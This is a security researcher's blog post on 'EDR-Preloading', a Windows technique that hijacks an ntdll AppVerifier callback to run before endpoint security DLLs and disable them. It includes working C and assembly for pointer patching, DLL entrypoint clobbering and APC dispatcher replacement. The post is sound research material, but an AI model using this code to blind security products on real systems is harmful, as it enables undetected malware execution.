Bypassing EDRs With EDR-Preloading

Previously, I wrote an article detailing how system calls can be used to bypass user mode EDR hooks.
Now, I want to introduce an alternative technique, “EDR-Preloading”, which involves running malicious code before the EDR’s DLL is loaded into the process, enabling us to prevent it from running at all.
By neutralizing the EDR module, we can freely call functions normally without having to worry about user mode hooks, and therefore don’t need to rely on direct or indirect syscalls.

This technique makes use of some assumptions and flaws in the way EDRs load their user mode component.
The EDR needs to inject its DLL into every process in order to hook user mode functions, but run the DLL too early and the process will crash; run it too late and the process may have already executed malicious code.
The sweet spot most EDRs have settled on is starting their DLL as late in process initialization as possible, while still being able to do everything they need before the process entrypoint is called.

Theoretically, all we need is to find a way to load code a little bit earlier in process initialization, then we can preempt the EDR.

To understand when EDR DLLs can and can’t load, we need to understand a bit about process initialization.

Whenever a new process is created, the kernel maps the target executable’s image into memory along with ntdll.dll.
A single thread is then created, which will eventually serve as the entrypoint thread.
At this point, the process is just an empty shell (the PEB, TEB, and imports are all uninitialized). Before the process entrypoint can be called, a fair bit of setup must be performed.

Whenever a new thread starts, its start address will be set to ntdll!LdrInitializeThunk(), which is responsible for calling ntdll!LdrpInitialize().

ntdll!LdrpInitialize() has two purposes:

Initialize the process (if it’s not already initialized)
Initialize the thread

ntdll!LdrpInitialize() first checks the global variable ntdll!LdrpProcessInitialized, which, if set to FALSE, will result in a call to ntdll!LdrpInitializeProcess() prior to thread initialization.

ntdll!LdrpInitializeProcess() does what it says on the tin. It’ll set up the PEB, resolve the process imports, and load any required DLLs.

Right at the end of ntdll!LdrpInitialize() is a call to ntdll!ZwTestAlert(), which is the function used to run all the Asynchronous Procedure Calls (APCs) in the current thread’s APC queue.
EDR drivers that inject code into the target process and call it via ntoskrnl!NtQueueApcThread() will see their code executed here.

Once the thread and process initialization is complete and ntdll!LdrpInitialize() returns, ntdll!LdrInitializeThunk() will call ntdll!ZwContinue(), which transfers execution back to the kernel.
The kernel will then set the thread instruction pointer to point to ntdll!RtlUserThreadStart(), which will call the executable entrypoint, and the process’s life officially begins.

Process initialization flow chart

Early APC queuing

Since APCs execute in first-in, first-out order, it’s sometimes possible to preempt certain EDRs by queueing your own APC first.
Many EDRs monitor for new processes by registering a kernel callback using ntoskrnl!PsSetLoadImageNotifyRoutine().
Whenever a new process starts, it automatically loads ntdll.dll and kernel32.dll, so this serves as a good way to detect when new processes are being initialized.
By starting a process in a suspended state, you can queue an APC prior to initialization, therefore ending up at the front of the queue.
This technique is sometimes known as “Early Bird injection”.
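
To make the ordering argument concrete, here is a toy model of a first-in, first-out queue. It is only an illustration of why the earliest queued item runs first; it does not touch real Windows APCs, and every name in it (toy_queue, toy_queue_push, toy_queue_pop) is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Toy model only: a fixed-size FIFO standing in for a thread's APC queue.
   Nothing here interacts with real APCs; all names are hypothetical. */
#define TOY_QUEUE_CAP 8

typedef struct {
    int    items[TOY_QUEUE_CAP];
    size_t head;   /* index of the oldest queued item */
    size_t count;  /* number of queued items */
} toy_queue;

static void toy_queue_init(toy_queue *q) {
    assert(q != NULL);
    q->head = 0;
    q->count = 0;
}

/* Appends id at the back of the queue. Returns 1 on success, 0 if full. */
static int toy_queue_push(toy_queue *q, int id) {
    assert(q != NULL);
    if (q->count == TOY_QUEUE_CAP) return 0;
    q->items[(q->head + q->count) % TOY_QUEUE_CAP] = id;
    q->count++;
    return 1;
}

/* Removes the oldest item into *out. Returns 1 on success, 0 if empty. */
static int toy_queue_pop(toy_queue *q, int *out) {
    assert(q != NULL && out != NULL);
    if (q->count == 0) return 0;
    *out = q->items[q->head];
    q->head = (q->head + 1) % TOY_QUEUE_CAP;
    q->count--;
    return 1;
}
```

Pushing item 1 and then item 2 and popping twice yields 1 first, which is the whole premise of queueing before anyone else does.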

The problem with queuing APCs is that they have long been used for code injection, therefore ntdll!NtQueueApcThread() is hooked and monitored by most EDRs.
Queuing an APC into a suspended process is highly suspicious and also well documented. It’s also possible the EDR could hook your
APC, re-order the APC queue, or do any manner of other things to ensure its DLL runs first.

TLS Callback

TLS callbacks are executed towards the end of ntdll!LdrpInitializeProcess(), but prior to ntdll!ZwTestAlert(), so they run before any APCs.
In cases where an application uses a TLS callback, some EDRs may inject code to intercept the callback, or load the EDR DLL slightly earlier to compensate.
Much to my surprise, one EDR I tested on was still bypassable using a TLS callback.

My goal was simple, but actually not simple at all, and also very time-consuming.
I wanted to find a way to execute code before the entrypoint, before TLS callbacks, before anything that could possibly interfere with my code.
This meant reverse engineering the entire process and DLL loader to look for anything I could use. In the end, I found exactly what I needed.

Behold, the AppVerifier and ShimEngine interfaces

Long ago, Microsoft created a tool called AppVerifier, for, well, app verification.
It’s designed to monitor applications at runtime for bugs, compatibility issues, and so on.
Much of AppVerifier’s functionality is facilitated by the addition of a whole host of new callbacks inside ntdll.

While reverse engineering the AppVerifier layer, I actually found two sets of useful callbacks (AppVerifier and ShimEngine).

Shim Engine related variables

App Verifier related variables

Two pointers that caught my eye were ntdll!g_pfnSE_GetProcAddressForCaller and ntdll!AvrfpAPILookupCallbackRoutine, part of the ShimEngine and AppVerifier layers respectively.
Both pointers are called towards the end of ntdll!LdrGetProcedureAddressForCaller(), which is the function used internally by GetProcAddress() to resolve the address of exported functions.

The code in LdrGetProcedureAddressForCaller() which implements the callbacks

These callbacks are great because LdrGetProcedureAddress() is guaranteed to be called by LdrpInitializeProcess() when it loads kernelbase.dll.
It’s also called any time anything tries to resolve an export with GetProcAddress() / LdrGetProcedureAddress(), including the EDR, which has a lot of fun potential.
Even better, these pointers exist in a memory section that’s writable prior to process initialization.

Deciding on a callback to hook

Whilst there were many good options, I decided to go with AvrfpAPILookupCallbackRoutine, which appears to have been introduced in Windows 8.1.
Whilst I could use the older callbacks for compatibility with earlier Windows versions, it’d be a lot more work and I wanted to keep my PoC simple.

The rest of the AppVerifier interface requires that you install a “Verifier Provider”, which requires a ton of memory manipulation.
The ShimEngine is slightly easier, but setting g_ShimsEnabled to TRUE enables all callbacks, not just the one we want, so we must register every callback or the application will crash.

The newer AvrfpAPILookupCallbackRoutine is very nice for two reasons:

It can be enabled independently of the AppVerifier interface by setting ntdll!AvrfpAPILookupCallbacksEnabled, so no AppVerifier provider is needed.
Both ntdll!AvrfpAPILookupCallbacksEnabled and ntdll!AvrfpAPILookupCallbackRoutine are easily locatable in memory, especially on Windows 10.

For demonstration purposes I decided to build a proof-of-concept that uses the AvrfpAPILookupCallbackRoutine callback to load before the EDR DLL, then prevent it from loading.
So far, I’ve only tested it on two major EDRs, but it should theoretically work against any EDR code injection with a few tweaks.

You can find the full source code at the bottom of the article.

Step 1: locating the AppVerifier callback pointer

In order to set up a callback we need to set ntdll!AvrfpAPILookupCallbacksEnabled and ntdll!AvrfpAPILookupCallbackRoutine.
On Windows 10, both variables are located towards the beginning of ntdll’s .mrdata section, which is writable during process initialization.

ntdll!AvrfpAPILookupCallbacksEnabled is found directly after ntdll!LdrpMrdataBase (though sometimes ntdll!LdrpKnownDllDirectoryHandle sits before it).

Both variables appear to always be exactly 8 bytes apart and in the same order.
In an initialized process, the layout should look something like this:

offset+0x00 – ntdll!LdrpMrdataBase (set to base address of .mrdata section)
offset+0x08 – ntdll!LdrpKnownDllDirectoryHandle (set to a non-zero value)
offset+0x10 – ntdll!AvrfpAPILookupCallbacksEnabled (set to zero)
offset+0x18 – ntdll!AvrfpAPILookupCallbackRoutine (set to zero)

We can scan the .mrdata section in our own process for a pointer containing the section base address; the first NULL value after that will be AvrfpAPILookupCallbacksEnabled, with AvrfpAPILookupCallbackRoutine sitting 8 bytes after it.

ULONG_PTR find_avrfp_address(ULONG_PTR mrdata_base) {
    ULONG_PTR address_ptr = mrdata_base + 0x280;  // the pointer we want is 0x280+ bytes in
    ULONG_PTR ldrp_mrdata_base = NULL;

    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == mrdata_base) {
            ldrp_mrdata_base = address_ptr;
            break;
        }
        address_ptr += sizeof(LPVOID);  // skip to the next pointer
    }
    
    address_ptr = ldrp_mrdata_base;
    
    // AvrfpAPILookupCallbacksEnabled should be the first NULL value after LdrpMrdataBase
    // (AvrfpAPILookupCallbackRoutine sits 8 bytes after it)
    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == NULL) {
            return address_ptr;
        }
        address_ptr += sizeof(LPVOID);  // skip to the next pointer
    }
    return NULL;
}
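
The scanning logic can be checked in isolation against a mock buffer. The sketch below is a portable rewrite of the same two-stage search under stated assumptions: it operates on an ordinary array of pointer-sized values supplied by the caller rather than on ntdll memory, it fails cleanly when the base marker is missing, and the name find_first_zero_after_base is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Searches `slots` (a mock array of pointer-sized values) for an entry equal
   to `base`, then returns the index of the first zero entry after it.
   Returns -1 if the base marker or a following zero entry is not found. */
static ptrdiff_t find_first_zero_after_base(const uintptr_t *slots, size_t n,
                                            uintptr_t base) {
    size_t i = 0;

    assert(slots != NULL);

    /* stage 1: locate the self-referencing base value */
    while (i < n && slots[i] != base) {
        i++;
    }
    if (i == n) {
        return -1;  /* marker not present, nothing to scan from */
    }

    /* stage 2: first zero entry strictly after the marker */
    for (i++; i < n; i++) {
        if (slots[i] == 0) {
            return (ptrdiff_t)i;
        }
    }
    return -1;
}
```

With a mock layout of { base, non-zero handle, 0, 0 } the function returns index 2, matching the offset+0x10 slot in the layout listed earlier.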

Step 2: setting up the callback to call our malicious code

The easiest way to set up the callback is to just launch a second copy of our own process in a suspended state.
Since ntdll is at the same address in every process, we only need to locate the callback pointer in our own process.
Once our process is launched but in a suspended state, we can just use WriteProcessMemory() to set the pointer.

We could also use this technique for process hollowing, shellcode injection, and more, since it allows us to execute code without creating/hijacking threads, or queuing an APC. But for this PoC we’ll keep it simple.

Note: since many ntdll pointers are encrypted, we can’t just set the pointer to our target address. We have to encrypt it first.
Luckily, the key is the same value and stored at the same location across all processes.

LPVOID encode_system_ptr(LPVOID ptr) {
    // get pointer cookie from SharedUserData!Cookie (0x330)
    ULONG cookie = *(ULONG*)0x7FFE0330;

    // encrypt our pointer so it will work when written to ntdll
    return (LPVOID)_rotr64(cookie ^ (ULONGLONG)ptr, cookie & 0x3F);
}
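
The encoding is just an XOR followed by a right rotation, so it is easy to sanity-check with a round trip. The sketch below is a portable illustration of that arithmetic only: the cookie is passed in as a parameter instead of being read from memory, and rotr64, rotl64, encode_ptr, and decode_ptr are hypothetical helper names, not ntdll functions.

```c
#include <assert.h>
#include <stdint.h>

/* Portable 64-bit rotates; the shift is masked so a count of 0 is well defined. */
static uint64_t rotr64(uint64_t value, unsigned shift) {
    shift &= 63;
    return shift ? (value >> shift) | (value << (64 - shift)) : value;
}

static uint64_t rotl64(uint64_t value, unsigned shift) {
    shift &= 63;
    return shift ? (value << shift) | (value >> (64 - shift)) : value;
}

/* Same arithmetic as encode_system_ptr above: XOR with the cookie,
   then rotate right by the low 6 bits of the cookie. */
static uint64_t encode_ptr(uint64_t ptr, uint32_t cookie) {
    return rotr64((uint64_t)cookie ^ ptr, cookie & 0x3F);
}

/* Inverse operation: undo the rotation first, then undo the XOR. */
static uint64_t decode_ptr(uint64_t encoded, uint32_t cookie) {
    return rotl64(encoded, cookie & 0x3F) ^ (uint64_t)cookie;
}

/* Round-trip self check with arbitrary example values. */
static void encode_ptr_self_check(void) {
    const uint64_t ptr = 0x00007FF612345678ULL;  /* made-up address */
    const uint32_t cookie = 0xDEADBEEFu;         /* made-up cookie  */
    assert(decode_ptr(encode_ptr(ptr, cookie), cookie) == ptr);
}
```

Decoding has to reverse the steps in the opposite order, which is why the rotation is undone before the XOR.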

Now we can just write the pointer and set AvrfpAPILookupCallbacksEnabled to 1 using WriteProcessMemory():

    // ntdll pointers are encoded using the system pointer cookie located at SharedUserData!Cookie
    LPVOID callback_ptr = encode_system_ptr(&My_LdrGetProcedureAddressCallback);

    // set ntdll!AvrfpAPILookupCallbacksEnabled to TRUE
    uint8_t bool_true = 1;

    // set ntdll!AvrfpAPILookupCallbackRoutine to our encoded callback address
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)(avrfp_address+8), &callback_ptr, sizeof(ULONG_PTR), NULL)) {
        printf("Write 2 failed, error: %lu\n", GetLastError());
    }

    if (!WriteProcessMemory(pi.hProcess, (LPVOID)avrfp_address, &bool_true, 1, NULL)) {
        printf("Write 3 failed, error: %lu\n", GetLastError());
    }

Step 3: executing the callback & neutralizing the EDR

Once we call ResumeThread() on the suspended process, our callback will be executed whenever LdrpGetProcedureAddress() is called, the first of which should be when LdrpInitializeProcess() loads kernelbase.dll.

LdrpInitializeProcess calling LdrLoadDll to load kernelbase.dll

A word of warning: kernelbase.dll is not fully loaded when our callback is fired, and the trigger happens inside LdrLoadDll, thus the loader lock is still acquired.
Kernelbase not yet being loaded means we’re limited to calling only ntdll functions, and the loader lock prevents us from launching any threads or processes, as well as loading DLLs.

Since we’re highly limited in what we can do, the simplest course of action is to just prevent the EDR DLL from loading, then wait until the process is fully initialized before starting the malware party.

To ensure proper neutralization of the EDRs I tested on, I took a multi-pronged approach.

DLL Clobbering

This early in the process lifecycle only ntdll.dll, kernel32.dll, and kernelbase.dll should be loaded.
Some EDRs may pre-emptively map their DLL into memory, but wait until later to call the entrypoint.
Whilst we could probably unload these DLLs by calling ntdll!LdrUnloadDll() once the loader lock is released (or do it manually), a quick and dirty solution is to just clobber their entrypoints.

What we’ll do is iterate through the LDR module list and just replace the entrypoint address of any DLL that shouldn’t be there.

DWORD EdrParadise() {
    // we'll replace the EDR entrypoint with this equally useful function
    // todo: cease malware

    return ERROR_TOO_MANY_SECRETS;
}

void DisablePreloadedEdrModules() {
    PEB* peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    LIST_ENTRY* list_head = &peb->Ldr->InMemoryOrderModuleList;
    LIST_ENTRY* list_entry = list_head->Flink->Flink;

    while (list_entry != list_head) {
        PLDR_DATA_TABLE_ENTRY2 module_entry = CONTAINING_RECORD(list_entry, LDR_DATA_TABLE_ENTRY2, InMemoryOrderLinks);

        // only the below DLLs should be loaded this early, anything else is probably a security product
        if (SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"ntdll.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernel32.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernelbase.dll") != 0) {

            module_entry->EntryPoint = &EdrParadise;
        }

        list_entry = list_entry->Flink;
    }
}
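
The listing above relies on SafeRuntime::wstring_compare_i, which is not shown in the article. As a rough idea of what such a helper does, here is a portable sketch of a case-insensitive wide-string compare and the three-name check built on it. This is an assumption about its behaviour, not the author's implementation: wide_compare_i and is_expected_early_module are hypothetical names, and the sketch uses the C runtime's towlower(), which would not be available in the restricted ntdll-only context described earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>
#include <wctype.h>

/* Hypothetical stand-in for a case-insensitive wide-string compare.
   Returns 0 when the strings match ignoring case, non-zero otherwise. */
static int wide_compare_i(const wchar_t *a, const wchar_t *b) {
    assert(a != NULL && b != NULL);
    while (*a != L'\0' && *b != L'\0') {
        wint_t ca = towlower((wint_t)*a);
        wint_t cb = towlower((wint_t)*b);
        if (ca != cb) {
            return ca < cb ? -1 : 1;
        }
        a++;
        b++;
    }
    if (*a == *b) {
        return 0;               /* both strings ended together */
    }
    return *a != L'\0' ? 1 : -1;  /* one string is a prefix of the other */
}

/* Returns 1 if name is one of the three modules the article expects to be
   present this early in process initialization, 0 otherwise. */
static int is_expected_early_module(const wchar_t *name) {
    static const wchar_t *const expected[] = {
        L"ntdll.dll", L"kernel32.dll", L"kernelbase.dll"
    };
    for (size_t i = 0; i < sizeof expected / sizeof expected[0]; i++) {
        if (wide_compare_i(name, expected[i]) == 0) {
            return 1;
        }
    }
    return 0;
}
```

Comparing case-insensitively matters because module names in the loader list are not guaranteed to use a consistent case (for example KERNELBASE.dll versus kernelbase.dll).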

Disabling the APC dispatcher

When APCs are queued to a thread they get processed by ntdll!KiUserApcDispatcher(), which runs the APC then calls ntdll!NtContinue() to return the thread to its original context.
By hooking KiUserApcDispatcher and replacing it with our own function that just calls NtContinue() in a loop, no APCs can ever be queued into our process (including those from the EDR’s kernel driver).

; simple APC dispatcher that does everything except dispatch APCs
KiUserApcDispatcher PROC
  _loop:
    call GetNtContinue
    mov rcx, rsp
    mov rdx, 1
    call rax
    jmp _loop
  ret
KiUserApcDispatcher ENDP

Proxying LdrLoadDll calls

By placing a hook on ntdll!LdrLoadDll(), we can monitor which DLLs are being loaded.
If any EDR tries to load its DLL using LdrLoadDll, we can unload or disable it.
Ideally we probably want to hook ntdll!LdrpLoadDll(), which is lower level and called directly by some EDRs, but for simplicity’s sake, we’ll just use LdrLoadDll.

// we can use this hook to prevent new modules from being loaded (though with both EDRs I tested, we don't need to)
NTSTATUS WINAPI LdrLoadDllHook(PWSTR search_path, PULONG dll_characteristics, UNICODE_STRING* dll_name, PVOID* base_address) {
    
    // todo: create a list of DLLs to either be allowed or disallowed
    
    return OriginalLdrLoadDll(search_path, dll_characteristics, dll_name, base_address);
}

While this PoC is only designed for Windows 10 64-bit, the technique should be viable on systems at least as early as Windows 7 (I haven’t checked XP or Vista).
However, finding the correct offsets is more difficult below Windows 10. For a more robust method, I recommend using a disassembler.
Either way, this was a fairly fun weekend project and hopefully someone is able to learn something from it.

If you enjoy my work please follow me on LinkedIn and Mastodon for more.

You can find the full source code here: github.com/MalwareTech/EDR-Preloader
